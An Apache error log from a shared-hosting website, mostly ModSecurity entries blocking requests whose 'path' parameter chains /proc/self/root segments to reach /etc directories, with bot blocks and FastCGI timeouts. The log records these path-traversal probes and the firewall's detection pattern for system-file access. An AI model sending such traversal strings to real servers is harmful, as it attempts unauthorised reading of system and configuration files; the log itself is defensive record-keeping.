[Wed Mar 18 01:06:54.298231 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:37170] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abok3cdf6f5d65gmYZR_2AAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 01:06:59.137236 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:55954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abok40zinOy1jxa1j4fBaAAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:07:02.126561 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47780] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:07:04.996354 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:39024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abok6Pu8EFLIOrSqIpu4dgAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:07:25.284976 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48300] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:07:47.133911 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48834] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:08:06.441286 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:35918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abolJvu8EFLIOrSqIpu4kwAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:08:10.133761 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49512] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:08:10.739871 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:56972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abolKtY0UrI5A3LftIw_sAAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:08:13.209028 2026] [mime_magic:error] [pid 17887:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:45460] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firewalld
[Wed Mar 18 01:08:13.209185 2026] [access_compat:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:45460] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/lib/firewalld
[Wed Mar 18 01:08:19.621399 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:36066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abolM9a6ubjKNq_cu4ZF-wAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:08:33.085832 2026] [proxy_fcgi:error] [pid 29882:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49994] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:08:53.121800 2026] [mime_magic:error] [pid 15826:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:45474] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware/netronome
[Wed Mar 18 01:08:55.128845 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50572] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:09:16.775323 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:58214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abolbOw_le52K8_3pV2QNgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:09:19.450968 2026] [proxy_fcgi:error] [pid 11816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51264] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:09:41.129696 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51902] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:10:03.209916 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52442] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:10:10.386763 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.244.43:33618] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abolouw_le52K8_3pV2QSwAAAg8"]
[Wed Mar 18 01:10:25.094705 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53004] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:10:35.860710 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.228.61:34036] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abolu-oXxyEfFpUF8f8dcQAAAVg"]
[Wed Mar 18 01:10:48.131325 2026] [proxy_fcgi:error] [pid 15051:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53630] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:11:11.121782 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54294] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:11:33.125954 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54866] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:11:34.203315 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:34630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abol9gkwaGbbGflqUZDECQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:11:40.058571 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:54758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abol_NY0UrI5A3LftIxALQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:11:41.358158 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:58092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abol_QkwaGbbGflqUZDEDgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:11:51.695750 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:58108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abomB9a6ubjKNq_cu4ZGTgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 01:11:56.663155 2026] [proxy_fcgi:error] [pid 29882:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55492] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:12:21.138394 2026] [proxy_fcgi:error] [pid 19507:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56142] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:12:47.033877 2026] [proxy_fcgi:error] [pid 29882:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56764] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:12:59.151976 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:57100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abomS0zinOy1jxa1j4fB_AAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:13:09.129780 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57410] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:13:23.414904 2026] [mime_magic:error] [pid 31803:tid 140411708356352] (70014)End of file found: [client 74.7.241.31:59722] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/kbd
[Wed Mar 18 01:13:32.159595 2026] [proxy_fcgi:error] [pid 29882:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58140] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:13:54.061944 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58760] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:13:55.150764 2026] [mime_magic:error] [pid 17887:tid 140411548894976] (70014)End of file found: [client 74.7.243.128:47686] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Wed Mar 18 01:13:55.151005 2026] [access_compat:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:47686] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Wed Mar 18 01:14:18.129834 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59370] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:14:20.888645 2026] [core:alert] [pid 26799:tid 140411590858496] [client 216.73.216.191:35090] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 01:14:39.053836 2026] [proxy_fcgi:error] [pid 17887:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59780] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:15:03.182230 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60232] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:15:11.999231 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.244.43:43810] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abomz0zinOy1jxa1j4fCFgAAAQ0"]
[Wed Mar 18 01:15:25.121806 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60666] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:15:36.127280 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.228.61:56456] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abom6Mdf6f5d65gmYZSAegAAAsM"]
[Wed Mar 18 01:15:47.133876 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:32856] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:16:09.129786 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33244] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:16:31.125840 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33606] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:16:38.062917 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:52338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abonJvu8EFLIOrSqIpu5IAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:16:39.403022 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:36756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abonJ_u8EFLIOrSqIpu5IgAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:16:53.135066 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33998] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:17:14.069853 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34310] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:17:37.125996 2026] [proxy_fcgi:error] [pid 15051:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34632] AH01075: Error dispatching request to : (polling)
